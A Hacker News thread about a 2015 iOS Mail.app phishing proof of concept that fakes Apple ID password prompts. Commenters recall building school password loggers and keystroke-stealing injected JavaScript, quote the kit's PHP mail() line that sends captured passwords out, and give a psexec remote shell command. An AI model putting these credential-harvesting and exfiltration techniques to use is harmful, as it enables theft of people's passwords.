Hacker News new | past | comments | ask | show | jobs | submit login
iOS 8.3 Mail.app inject kit (github.com)
200 points by diafygi on June 10, 2015 | hide | past | web | favorite | 38 comments

I've always been a little worried when using iOS8 because the popup to input usernames/passwords/passcodes looked very poorly designed by Apple's standards - there's an odd border around some very square text inputs, and the placeholder text is misaligned and not capitalised properly.

If I were more paranoid about the security of my phone I probably wouldn't have used these inputs because they seem a lot like a phishing attack - but I risked it an assumed it's just a bug or lazy reviewer at Apple.

I've also always been worried about that dialog since it pops up at the most random times, when some background iCloud connection fails or whatever and it guesses that it's an authentication issue rather than a network one. I've seen it show up on the homescreen, Safari, etc. I'm sure users are way too desensitized to those dialogs now.

They should at the very least bounce you to Settings.app instead of showing the dialog inside whatever app you're using.

This 10000X over! I try to never enter my password into those prompts unless I know what caused it to pop. Apple has failed MASSIVELY buy popping it all the time for any number of things. They need to explain better WHY they need it again because everytime I see it I know it could be a fake one or one being used to just harvest my PW instead of log me into anything.

When an app pops up and asks for my facebook or gmail, it's stupid that there is no equivalent guarentee like seeing the facebook or gmail url in a seperate window where you are filling out your password. Any iOS app that asks for access to an app can harvst passwords. No?

Oh, this stuff is fun. In high school, I made a WScript that prompted user "Network timed out on line #6. Please re-enter password:" and would surreptitiously record it. I put this on a floppy, popped it in when someone in the library went to the printer, waited, came back and said, "sorry forgot my floppy; can i get it, excuse me". Didn't use it maliciously; usually would just modify the folder settings on their home drive on the network to have repeating images of Pokemon as a background image. I suppose this all sounds quite devious in writing.

I also made a password logger in high school (like presumably a great many bored kids). The network was all DOS machines where you used a command line tool to manually log in to a Novell server. There was no security in that system, so I wrote a simple wrapper that looked like the Novell login tool, saved the passwords and then shelled out to the real thing to provide access.

I didn't use the passwords for anything... But there was a guy in another class whose password was the name of the girl on whom I had a crush too. Illicit knowledge bred jealousy! Neither of us ever got the girl.

Net Send was another nice temptation to the average teenager troll.

As an admin, I really miss Net Send. I would love to have a simple way to send messages to users, especially in an emergency (like the office internet going out) so I don't get told 20 times.

It sucks that they depreciated it. I wish it were still around, maybe we could have it disabled by default, and just use a GPO to enable it.

If I need to get a message to a machine or troll someone, I do a psexec -s cmd to their box, then do: msg * "insert message here"

Are you me?

I did the very same thing ~20 years ago. I used a DOS Terminate and Stay Resident (TSR) code to achieve this, I did't have to fake any screen. The key strokes were stored in a file.

I still remember keyboard interrupt value (0x9) while registering TSR code.

Was it with Novel network? 'cuz I remember their login being paranoid and starting to emit beeps with TSR hooked on keyboard interrupt. Or maybe it was just a sloppy coding from 12 years old me :)

I did the same except that I put the file onto a network drive so that I could access it from a less conspicuous location. Also, made a crude chat program in a similar manner.

I used to use a discussion forum website that didn't encrypt cookies. A friend created a 1x1 pixel transparent flash app that read everyone's user name and password and transmitted it to him.

That brings back memories, I did exactly the same too. The logins were shared with the Windows machines so after nabbing the password of our maths teacher, a few friends and I went through his account vandalising his PowerPoint slides to add subtle nonsense. Poor guy didn't know what on earth was going on during his lectures. Also found out the 'debug' login for the switches and used it to rather destructively mess with the network, much to the chagrin of the sysadmins. Good times!

Hey, at least you had passwords. The network in my school district just used an invisible drive to store everything. If you manually navigated to something like h: or g: (can't remember) you'd suddenly have full access to every person in the school's home directory.

Chalk me up as another person who did exactly the same thing (Novell and everything), only I got expelled for it.

Not the same thing but in Middle School we used our "id numbers" for passwords everywhere. They were also helpfully printed on all of our schedules which a number of students simply slid into the front see-through plastic sleeve on their binders making it trivial to get nearly anyone's password. I wanted to see if there was a pattern to the id numbers (to see if given some info I could guess the id number) so I started collecting them passively. Just writing down the name of the student and their id number and storing them all in a program called HyperStudio (This was like powerpoint for mac but much more kid friendly and easier scripting) which I hid behind a number of hidden buttons on a project that looked legit (No clue why I did this, I could have just stored them in a text file but I wanted to play with HS some more and hiding them felt more fun). I never got to the point that I could discern any pattern because I very stupidly read off a student's id number when they pissed me off for shock value (I was in middle school, cut me a break) and they told the teacher and by the end of the day I was sitting in the principal's office. I got in a bit of trouble and lost computer access for the rest of the year (that really sucked) but I'm just glad it didn't happen in today's climate where I probably could have been charged with computer hacking/fraud charges. Like elwell I never once considered using it for malicious reasons and honestly I only logged into 1-2 accounts to confirm they worked but the vast majority I had no interest in looking at their network share folder (They were just full of a bunch of school assignments after all). Looking back it was extremely stupid and could have resulted in much worse consequences. That said I stand by my opinion at the time that they were blowing it WAY out of proportion and used the word "hacked" a number of times when really all I did was observe data that students were exposing right on the outside of their binders. I only lost computer access because I stored the numbers on a computer which to me at the time and now seems like some pretty stupid reasoning but whatever.

The demo video is pretty convincing.


Yes, this is pretty bad for Apple, I wonder if they find a way to extort this poor man to remove it.

I also liked the fact YouTube started to play "New iOS 8 Mail App: Here's Why It Is Impressive!" video automatically after that video.

Apple and other companies have had plenty worse vulnerabilities for their operating systems exposed and there is not any evidence that extortion took place afterwards for someone to go quiet.

Did this guy e-mail Apple product security?


My experience with product-security@apple.com was that they sat on my report without doing anything for several months, then finally put together a fix after I threatened to go public.

It sounds like this guy may have skipped the threatening step and just went public.

Apparently filed a Radar report on Jan 15, 2015.

And every time it's tested:

"mail('product-security@apple.com','Apple ID Password',"Thanks for your password! \n $data ¯\_(ツ)_/¯ \n https://github.com/jansoucek/iOS-Mail.app-inject-kit");"

[1]: https://github.com/jansoucek/iOS-Mail.app-inject-kit/blob/ma...

Smart and cheeky at the same time, like it!

Wouldn't one fix be for native modals (not created by web) to have a distinguishing feature? For example, native modal backgrounds could uses your home screen background with a reduced opacity and blur. This could mitigate these types of phishing attacks since emulating the look and feel in web (html/css) would be difficult.

There's a thing in scam popups and emails - they are left not-perfect so that they can weed out the easier targets. I'm not sure if it is 100% applicable on this situation, but maybe there's something to it.

"We care about security - but only when there's a public exploit." - Apple

In university's computer labs I have modified Firefox. It injected JavaScript at the header. This JS was sending everything typed in Firefox to my server. It was nice to read other people's conversatoins (only the one side of course). Normally most computers' BIOS was password protected. These ones were left without BIOS protection, so I was able to run Linux from a USB drive and modify Program Files folder in C:\

I think a good idea would be to include a personal image to the popups, for example the user's profile image.

Interesting bug, but I'd call the title a bit of an exaggeration. The mail app doesn't 'allow' harvesting Apple IDs, it allows unexpected content to be displayed in emails, and the author shows a proof of concept of using that for relatively convincing phishing.

You may not fall for this -- but a good section of non-technical people would. Harvesting is not an exaggeration.

A good section of non-technical people would fall for the same thing if presented from any random website in Safari (especially with iOS's predilection towards random password popups from background processes...). Not trying to downplay the issue, just provide some perspective.

One big difference is that by tying it to the email client, you're already showing the targets email address pre-filled, just like the legit prompt would. Plus, you can specifically target an individual and show the prompt without needing to convince them to visit a webpage first.

We changed the title to that of the page. Submitted title was "iOS Mail App Allows Harvesting Apple IDs".

When submitting, please follow the guidelines and use the original title unless it is misleading or linkbait.


Well, lucky me, I don't use Mail App. I'm using the GMail App

Apple security really is the laughing stock of the info security world these days.

First the SMS of doom that could crash any iOS or Mac device, now this. Seriously though, thanks for the fappening!

If all you need are those two vulnerabilities to be a laughing stock of the security world then would not every operating system and major piece of software fit that bill?

Guidelines | FAQ | Support | API | Security | Lists | Bookmarklet | Legal | Apply to YC | Contact